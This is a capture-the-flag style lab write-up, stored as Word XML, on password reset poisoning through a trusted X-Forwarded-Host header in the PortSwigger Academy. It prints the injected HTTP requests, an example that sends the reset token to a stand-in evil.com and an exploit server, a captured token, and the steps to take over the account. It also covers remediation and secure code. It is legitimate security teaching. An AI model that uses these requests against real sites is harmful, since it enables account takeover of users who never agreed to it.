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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Lab Write-Up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Password Reset Poisoning via Middleware</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="4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Author: Neelesh Pandey  |  Platform: PortSwigger Web Security Academy  |  Difficulty: Practitioner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 / Password Reset Poisoning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Header Exploited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X-Forwarded-Host — trusted by middleware for URL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Attack Vector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Inject exploit server URL → steal carlos's reset token from access log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Captured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nb7rvOaFATq1hd0wdGBJ0QyYYnFSb4t1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 reset for carlos → login → lab solved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1. THE VULNERABILITY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application generates password reset URLs dynamically using the X-Forwarded-Host header — a header set by proxies and load balancers to indicate the original requested host. By injecting an attacker-controlled domain in this header, the reset email sent to the victim contains a poisoned link.</w:t>
      </w:r>
    </w:p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Normal flow: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/forgot-password (Host: real-site.com)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→ Email: https://real-site.com/reset?token=abc123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Poisoned flow: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/forgot-password (X-Forwarded-Host: evil.com)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→ Email: https://evil.com/reset?token=abc123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Carlos clicks link → token sent to evil.com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Attacker uses token on real site → resets password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2. RECONNAISSANCE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2.1 Confirm Dynamic URL Generation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Submitted password reset for own account (wiener). Reset email confirmed domain matches Host header — URL is dynamically generated from request headers.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2.2 Test X-Forwarded-Host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/forgot-password HTTP/2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Host: &lt;lab-id&gt;.web-security-academy.net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X-Forwarded-Host: test.com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username=wiener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Reset email domain changed to test.com — X-Forwarded-Host confirmed trusted for URL generation.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3. EXPLOITATION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3.1 Poisoned Request for Carlos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/forgot-password HTTP/2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Host: &lt;lab-id&gt;.web-security-academy.net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X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net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Content-Type: application/x-www-form-urlencoded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username=carlos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Server generates valid token for Carlos's account and sends email with poisoned URL pointing to exploit server.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3.2 Token Captured from Exploit Server Log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/forgot-password?temp-forgot-password-token=nb7rvOaFATq1hd0wdGBJ0QyYYnFSb4t1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Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net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Carlos clicked the link — his valid token arrived in the exploit server access log.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3.3 Use Token on Real Site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Took the real reset URL structure from own email (wiener's) and replaced the token with Carlos's stolen token:</w:t>
      </w:r>
    </w:p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https://&lt;lab-id&gt;.web-security-academy.net/forgot-password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?temp-forgot-password-token=nb7rvOaFATq1hd0wdGBJ0QyYYnFSb4t1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Password reset form loaded for Carlos's account → set new password → login → lab solved.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4. ATTACK FLOW SUMMARY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X-Forwarded-Host: exploit-server.net + username=carlos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Server generates carlos's token → email sent with poisoned URL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https://exploit-server.net/reset?token=nb7rvOaF...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Carlos clicks → token delivered to exploit server access log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Attacker uses token on real site → resets carlos's password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Login as carlos → lab solved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5. VARIANTS COMPARISON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1800"/>
        <w:gridCol w:w="27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Variant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Header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When it Works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Basic Host header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Apprentice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proxy, no Host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Via middleware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X-Forwarded-Host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Practitioner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Behind proxy, header trusted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Dangling markup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HTML in Host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Headers blocked, HTML injection possible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6. KEY TAKEAWAYS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X-Forwarded-Host is as dangerous as Host for URL generation — should only be trusted from known proxy IPs, never from arbitrary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Reset tokens are single-use high-value credentials — one stolen token = complete account takeover without knowing the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token is valid on the real site — poisoned email only changes the domain, the token itself is genuine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 logs are the attack channel — token arrives as URL query parameter visible in HTTP access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Always test multiple proxy headers — X-Forwarded-Host, X-Host, X-Forwarded-Server, Forwarded: host=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Burp Collaborator alternative — use collaborator domain instead of exploit server for external token delivery detection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7. REMEDIATION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Risk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X-Forwarded-Host trusted from any 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Whitelist trusted proxy IPs — only accept header from known infrastructure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Reset URL domain from request header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Hardcode application domain — never use request headers for URL generation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token invalidation on wrong host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Invalidate token if accessed from unexpected domain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SPF/DKIM on outgoing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email authentication to prevent phishing variants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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WRONG — uses request header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reset_url = f"https://{request.headers['X-Forwarded-Host']}/reset?token={token}"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CORRECT — hardcoded or from server config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reset_url = f"https://{settings.BASE_URL}/reset?token={token}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A56A0" w:sz="4" w:space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Neelesh Pandey  |  github.com/Neelesh707  |  linkedin.com/in/neelesh-pandey021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2026-04-14T05:32:39.971Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-14T05:32:39.972Z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